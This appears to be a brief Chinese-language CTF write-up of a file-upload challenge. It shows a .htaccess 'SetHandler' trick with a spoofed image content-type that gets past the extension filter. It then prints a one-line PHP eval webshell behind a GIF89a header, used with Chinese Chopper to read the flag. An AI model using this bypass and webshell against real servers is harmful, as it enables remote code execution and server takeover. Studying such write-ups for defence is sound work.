这题我先上传了一个正常的图片，一直传不上。奇了怪了，原来是对图片大小还有限制。

传个空的jpg文件上传成功。

上传php2, php3, php4, php5, phps, pht, phtm, phtml后缀也都爆出ph的检查。

上传.htaccess文件修改content-type为image/jpeg可绕过检查。

内容为

SetHandler application/x-httpd-php

 传个webshell继续修改content-type，菜刀连接。

GIF89a?
<script language="php">eval($_POST['a']);</script>

根目录找到flag